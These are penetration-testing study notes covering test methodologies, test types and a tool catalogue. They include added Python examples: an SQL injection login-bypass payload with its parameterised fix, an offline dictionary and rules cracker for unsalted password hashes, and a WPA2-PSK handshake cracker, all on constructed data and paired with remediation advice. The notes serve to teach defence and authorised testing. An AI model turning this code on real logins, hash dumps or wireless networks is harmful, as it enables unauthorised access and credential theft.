Penetration Testing


Penetration testing:

It is commonly known as a pen test or pentest in ethical hacking. It is an authorised, simulated cyberattack carried out to assess the security posture of a system and to find weaknesses before a real attacker does.

Types of Penetration Testing Methodologies:

1. Black Box penetration testing
2. Grey Box penetration testing
3. White Box penetration testing

Black Box Penetration Testing:-

• In this method, the attacker has no prior knowledge of the target, so it closely simulates a real cyberattack by an external black hat hacker.
• This testing takes more time, as the attacker does not know the system and must first gather information about it (reconnaissance).
• This method is used to find the vulnerabilities exposed to an outsider and to simulate how far a hacker can get into the system without any prior information about it.

Grey Box Penetration Testing:-

In this method, the attacker is provided with partial information about the target, such as network configurations, subnets, or a specific IP range to test, so they have a basic idea of the environment they are going to attack. They may also be provided with low-privilege login credentials or limited access to the system, which gives them a clearer starting point. This saves the time that would otherwise be spent on reconnaissance of the target.

White Box Penetration Testing:-

In this testing method the attackers have developer-level knowledge of the system, which includes an assessment of the source code; the ethical hackers have full access to the system and can test it in far more depth than in black box testing. It is used to discover potential threats to the system arising from bad programming, misconfigurations, or a lack of defensive measures.

Qn1. Penetration testing, or pen testing, involves simulating attacks on a system to identify vulnerabilities before malicious actors can exploit them. Different penetration tests focus on different parts of an organization's IT infrastructure. The main types are:

1. External testing
2. Web application testing
3. Internal testing
4. Wireless (SSID/Wi-Fi) testing
5. Mobile application testing

1. External Testing
External penetration testing targets the organization's internet-facing assets, such as websites, servers, and network infrastructure that are reachable from the internet. The goal is to identify and exploit vulnerabilities that an attacker on the internet could use to gain unauthorized access or disrupt services.
Example: A penetration tester might target a company's public web server, first enumerating the services exposed on its open ports and their versions, then looking for misconfigurations or outdated software. Using tools like Nmap for discovery and Metasploit for exploitation, they attempt to turn those findings into unauthorized access or service disruption.

Tools Used: Nmap, Metasploit, Nessus

Nmap:

• Functionality: Nmap (Network Mapper) is a powerful network scanning tool used to discover hosts, services, and open ports on a network. It helps in creating a network map and identifying potential vulnerabilities through service and version detection.

2. Web Application Testing


Overview: Web application penetration testing assesses the security of web applications by
identifying and exploiting vulnerabilities like SQL injection, cross-site scripting (XSS), cross-site
request forgery (CSRF), and insecure direct object references. This type of testing helps ensure that
web applications are secure against common web-based attacks.

Example: A tester might use OWASP ZAP or Burp Suite to scan a web application for vulnerabilities. They could find an XSS vulnerability that allows them to inject malicious scripts into pages served to other users, potentially stealing user data or hijacking sessions.

Tools Used: OWASP ZAP, Burp Suite, Acunetix

OWASP ZAP (Zed Attack Proxy)

• Functionality: OWASP ZAP is an open-source web application security scanner. It helps in finding security vulnerabilities in web applications through automated scanning and manual testing tools.

Burp Suite

• Functionality: Burp Suite is a comprehensive suite of tools for web application security testing. It includes features like a web vulnerability scanner, an intercepting proxy, a repeater, and an intruder for automated attacks.
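SQL injection heads the list of flaws above, and the way a web-application tester confirms it is a differential check: a tautology payload in the login form must not authenticate. As an added example, not code from these notes, the Python below shows the vulnerable string-built query beside its parameterised fix and the check a tester would run against each. The `users` table, its rows and the `login_*` handlers are constructed stand-ins for a real application (a real one would store password hashes, not plaintext).

```python
"""SQL injection: the vulnerable login query beside its parameterised fix.

Added example, not from the original notes. Uses an in-memory SQLite table
with constructed rows so it runs offline; login_vulnerable / login_safe stand
in for a web application's authentication handler.
"""
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", [
        ("alice", "correct horse battery", "admin"),  # constructed sample rows
        ("bob", "hunter2", "user"),
    ])
    return conn


def login_vulnerable(conn, username, password):
    """String concatenation: attacker-controlled input becomes SQL syntax."""
    sql = ("SELECT username, role FROM users WHERE username = '%s' "
           "AND password = '%s'" % (username, password))
    return conn.execute(sql).fetchall()


def login_safe(conn, username, password):
    """Parameterised query: input is bound as data and never parsed as SQL."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchall()


# Classic tautology payload; `--` comments out the password check in the
# concatenated query, so it becomes ... WHERE username = 'admin' OR '1'='1'
PAYLOAD_USER = "admin' OR '1'='1' --"


def bypass_detected(login_fn, conn):
    """Tester's check: an invalid password plus the payload must return no rows."""
    return len(login_fn(conn, PAYLOAD_USER, "not-the-password")) > 0


def demo():
    conn = make_db()
    return {
        "vuln_bypass": login_vulnerable(conn, PAYLOAD_USER, "x"),  # every user leaks
        "safe_bypass": login_safe(conn, PAYLOAD_USER, "x"),        # nothing
        "safe_valid": login_safe(conn, "bob", "hunter2"),          # normal login still works
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

The vulnerable handler returns every row for the payload, which in a real application means logging in as the first user (often the administrator); the fixed handler returns nothing for the payload and still authenticates a legitimate user, which is the pair of results a report should show.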

3. Internal Testing
Overview: Internal penetration testing simulates an attack from within the organization's network. This could represent an insider threat or an attacker who has already breached the perimeter defenses. The focus is on identifying vulnerabilities within the internal network, such as weak passwords, unpatched systems, and misconfigurations.
Example: An internal penetration tester might use Nessus to scan the internal network for vulnerabilities and Wireshark to capture and inspect traffic on the segment (for example, credentials sent over unencrypted protocols). They could exploit a weak password on a database server to gain access to sensitive information.

Tools Used: Nessus, Wireshark, BloodHound

Wireshark

• Functionality: Wireshark is a network protocol analyzer that captures and displays network traffic in real time. It allows detailed inspection of data packets to diagnose network issues and detect malicious activity.

4. SSID or Wireless Testing


Overview: Wireless penetration testing evaluates the security of an organization's wireless networks
(Wi-Fi). This includes assessing the encryption methods used, the strength of passwords, and the
potential for unauthorized access points. The aim is to ensure that wireless networks are secure
against eavesdropping, unauthorized access, and other wireless-specific attacks.

Example: A penetration tester might use Aircrack-ng to put a wireless card into monitor mode, capture a WPA2 four-way handshake, and run an offline dictionary attack against the pre-shared key. They could also use tools like Kismet to identify rogue access points and assess the security of legitimate ones.

Tools Used: Aircrack-ng, Kismet, Wireshark

Aircrack-ng

• Functionality: Aircrack-ng is a suite of tools for assessing Wi-Fi network security. It includes tools for monitoring, attacking, testing, and cracking Wi-Fi passwords.

5. Mobile Application Testing


Overview: Mobile application penetration testing focuses on identifying vulnerabilities in mobile
apps, which can include issues like insecure data storage, weak server-side controls, improper
session handling, and flaws in the authentication process. Testing is done on both the mobile app
and the backend services it interacts with.

Example: A tester might use tools like MobSF and Drozer to analyze a mobile application for
vulnerabilities. They could discover that sensitive data is being stored insecurely on the device,
making it accessible to malicious apps or users.
Tools Used: MobSF, Drozer, Burp Suite Mobile Assistant

MobSF (Mobile Security Framework)

• Functionality: MobSF is an automated, all-in-one mobile application security testing framework that performs static analysis of Android, iOS, and Windows apps and dynamic analysis of apps running in an emulator or on a device (primarily Android).

Qn3. Penetration testing tools:

Penetration testing involves a wide range of tools that help testers identify, exploit, and document vulnerabilities in systems, networks, and applications. Here is a look at some of the most commonly used penetration testing tools, categorized by their primary function:

Network Scanning and Discovery

1. Nmap
o Functionality: Network discovery, port scanning, service detection, and operating
system fingerprinting.
o Usage: Identifies live hosts, open ports, and running services on a network.

2. Nessus
o Functionality: Comprehensive vulnerability scanning.
o Usage: Detects security vulnerabilities, configuration issues, and missing patches.

Exploitation Frameworks

1. Metasploit
o Functionality: Exploit development and execution, payload generation, and post-
exploitation tools.
o Usage: Simulates attacks by exploiting vulnerabilities to gain unauthorized access.

2. Canvas
o Functionality: Commercial exploitation framework with a library of exploits.
o Usage: Similar to Metasploit but with different exploit modules and commercial
support.

Web Application Testing

1. OWASP ZAP (Zed Attack Proxy)
o Functionality: Automated and manual web application security testing.
o Usage: Identifies vulnerabilities like SQL injection, XSS, and more through active and passive scanning.

2. Burp Suite
o Functionality: Comprehensive suite for web application security testing, including a
proxy, scanner, intruder, repeater, and more.
o Usage: Intercepts and modifies HTTP requests and responses, scans for
vulnerabilities, and automates attacks.
3. Acunetix
o Functionality: Automated web vulnerability scanning.
o Usage: Detects web application vulnerabilities like SQL injection, XSS, and other
common issues.

Password Cracking

1. John the Ripper
o Functionality: Password cracking tool.
o Usage: Cracks passwords through brute force, dictionary, and hybrid attacks.

2. Hashcat
o Functionality: Advanced password recovery tool using GPUs.
o Usage: Cracks hashes using various attack methods and highly optimized algorithms.
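The dictionary and hybrid attacks listed for John the Ripper and Hashcat are also how the "weak password on a database server" from the Internal Testing example is usually found: the tester obtains password hashes and cracks them offline. As an added example, not code from these notes, the Python below runs a wordlist with simple mangling rules against a hash dump in the `user:hash` shape Hashcat consumes. The users, the wordlist and the hashes are constructed (the hashes are computed from known passwords so the example runs offline); the algorithms used (unsalted MD5, SHA-1, SHA-256) are exactly the kind of fast hashes that make this attack cheap.

```python
"""Offline dictionary / hybrid attack against a dump of password hashes.

Added example, not from the original notes. HASH_DUMP is constructed from
known passwords; WORDLIST and the mangling rules are a tiny stand-in for a
real wordlist and rule file. Unsalted fast hashes are the point: one
hashlib call per candidate is all it costs to test a guess.
"""
import hashlib


def digest(algo, text):
    return hashlib.new(algo, text.encode()).hexdigest()


# Constructed "user:hash" dump, as a tester might pull from a compromised
# internal server; the hash type is known from its length/format.
HASH_DUMP = [
    ("svc_backup", "md5",    digest("md5",    "Summer2023!")),
    ("dba",        "sha1",   digest("sha1",   "password123")),
    ("jsmith",     "sha256", digest("sha256", "Welcome1")),
    ("ciso",       "sha256", digest("sha256", "9v$Lq2!pTz#8wRk@")),  # not guessable from the list
]

WORDLIST = ["password", "welcome", "summer2023", "letmein", "admin"]


def candidates(word):
    """Hybrid rules: case variants plus the suffixes users actually append."""
    for base in (word, word.capitalize(), word.upper()):
        yield base
        for suffix in ("1", "123", "!", "2023", "2024"):
            yield base + suffix


def crack(dump, wordlist):
    """Return {user: recovered_password} for every hash a candidate matches."""
    # Index hashes by digest so each candidate costs one lookup per algorithm.
    by_digest = {d: user for user, _algo, d in dump}
    algos = sorted({algo for _user, algo, _d in dump})
    cracked = {}
    for word in wordlist:
        for cand in candidates(word):
            for algo in algos:
                user = by_digest.get(digest(algo, cand))
                if user is not None and user not in cracked:
                    cracked[user] = cand
    return cracked


def survivors(dump, cracked):
    """Accounts whose hashes resisted the wordlist (a strong or unusual password)."""
    return [user for user, _algo, _d in dump if user not in cracked]


if __name__ == "__main__":
    found = crack(HASH_DUMP, WORDLIST)
    print("cracked:", found)
    print("survived:", survivors(HASH_DUMP, found))
```

Three of the four accounts fall to a five-word list with trivial rules, which is the finding to report; the remediation is a slow, salted password hash (bcrypt, scrypt or Argon2) plus a password policy that rejects dictionary words with common suffixes, not a longer wordlist ban.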

Wireless Network Testing

1. Aircrack-ng
o Functionality: Suite of tools for wireless network auditing (monitoring, packet capture and injection, cracking).
o Usage: Captures and analyzes wireless traffic, recovers WEP keys, and runs offline dictionary attacks against captured WPA/WPA2-PSK handshakes.

2. Kismet
o Functionality: Wireless network detector, sniffer, and intrusion detection system.
o Usage: Detects wireless networks, captures packets, and identifies unauthorized
access points.
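Both the Wireless Testing example in Qn1 and the Aircrack-ng entry above come down to one computation: from a sniffed four-way handshake, recompute the EAPOL message-integrity code for each candidate passphrase until one matches. As an added example, not code from these notes or from the Aircrack-ng project, the Python below implements that check with the IEEE 802.11i primitives (PBKDF2-HMAC-SHA1 for the PMK, the SHA-1 PRF for the PTK, HMAC-SHA1 for the MIC of key-descriptor version 2). No pcap is read: `build_capture` fabricates the handshake fields a sniffer would extract, and the SSID "CorpGuest", the MAC addresses, the nonces and the simplified EAPOL frame are all constructed values.

```python
"""How a WPA2-PSK is recovered from a captured 4-way handshake.

Added example, not from the original notes. build_capture() is a constructed
stand-in for handshake message 2 pulled from a pcap. Crypto per IEEE 802.11i:
PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32); PTK from the
"Pairwise key expansion" PRF; MIC = HMAC-SHA1(KCK, EAPOL frame)[:16].
"""
import hashlib
import hmac
import struct


def pmk_from_passphrase(passphrase, ssid):
    """The PMK (== PSK) from the human passphrase; the expensive step per guess."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """First 16 bytes of the PTK (PRF-512) are the Key Confirmation Key used for the MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return ptk[:16]


def eapol_mic(kck, eapol_frame):
    """MIC over the EAPOL-Key frame with its own MIC field zeroed."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def build_capture(ssid, real_passphrase):
    """Constructed stand-in for the sniffed handshake (message 2, client -> AP)."""
    ap_mac = bytes.fromhex("001122334455")        # made-up BSSID
    sta_mac = bytes.fromhex("66778899aabb")       # made-up client MAC
    anonce = hashlib.sha256(b"constructed-anonce").digest()
    snonce = hashlib.sha256(b"constructed-snonce").digest()
    # Simplified EAPOL-Key body without key data: descriptor type 2, key info
    # 0x010a (version 2 / HMAC-SHA1, pairwise, MIC present), key length,
    # replay counter, SNonce, key IV, RSC, ID, zeroed MIC, key data length.
    body = (b"\x02" + struct.pack(">H", 0x010A) + struct.pack(">H", 16)
            + struct.pack(">Q", 1) + snonce + bytes(16) + bytes(8) + bytes(8)
            + bytes(16) + struct.pack(">H", 0))
    eapol = b"\x01\x03" + struct.pack(">H", len(body)) + body
    pmk = pmk_from_passphrase(real_passphrase, ssid)
    mic = eapol_mic(kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce), eapol)
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol": eapol, "mic": mic}


def crack_psk(cap, wordlist):
    """Dictionary attack: the candidate whose recomputed MIC equals the sniffed one."""
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, cap["ssid"])
        kck = kck_from_pmk(pmk, cap["ap_mac"], cap["sta_mac"], cap["anonce"], cap["snonce"])
        if hmac.compare_digest(eapol_mic(kck, cap["eapol"]), cap["mic"]):
            return candidate
    return None


if __name__ == "__main__":
    cap = build_capture("CorpGuest", "summer2023")  # constructed network and PSK
    print(crack_psk(cap, ["password", "letmein", "summer2023", "Welcome1"]))
```

Nothing in the capture leaks the passphrase directly; each guess costs 4096 HMAC-SHA1 iterations, which is why Aircrack-ng and Hashcat lean on wordlists and GPUs rather than brute force. A long random passphrase keeps the key out of any wordlist, and WPA2-Enterprise or WPA3 (SAE) removes the offline-crackable handshake altogether.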

Proxy Tools

1. Burp Suite
o Functionality: (As described above)
o Usage: Functions as a proxy to intercept and analyze web traffic.

2. Fiddler
o Functionality: Web debugging proxy.
o Usage: Captures and inspects HTTP(S) traffic, allows for modification of requests and
responses.

OSINT (Open Source Intelligence) Tools

1. Maltego
o Functionality: Data mining and visualization tool.
o Usage: Maps relationships between people, companies, domains, and other entities
using public data.

2. Recon-ng
o Functionality: Web reconnaissance framework written in Python.
o Usage: Automates OSINT gathering tasks and integrates various information
sources.

Mobile Application Testing

1. MobSF (Mobile Security Framework)
o Functionality: Automated static analysis for Android, iOS, and Windows apps, and dynamic analysis (primarily Android).
o Usage: Identifies security issues in mobile applications.

2. Drozer
o Functionality: Security audit and attack framework for Android apps.
o Usage: Interacts with components of Android applications to find and exploit
vulnerabilities.

Packet Sniffing and Network Analysis

1. Wireshark
o Functionality: Network protocol analyzer.
o Usage: Captures and inspects network traffic in real-time to diagnose network issues
and detect malicious activity.

Social Engineering Tools

1. Social-Engineer Toolkit (SET)
o Functionality: Framework for social engineering attacks.
o Usage: Simulates various social engineering attacks like phishing, credential harvesting, and more.

Post-Exploitation Tools

1. Mimikatz
o Functionality: Extracts plaintext passwords, password hashes, PINs, and Kerberos tickets from memory (the LSASS process) on Windows.
o Usage: Used in post-exploitation to escalate privileges, move laterally (pass-the-hash, pass-the-ticket), and maintain access.

2. Empire
o Functionality: Post-exploitation framework for Windows, Linux, and macOS.
o Usage: Automates the post-exploitation phase with modules for credential dumping,
lateral movement, and more.
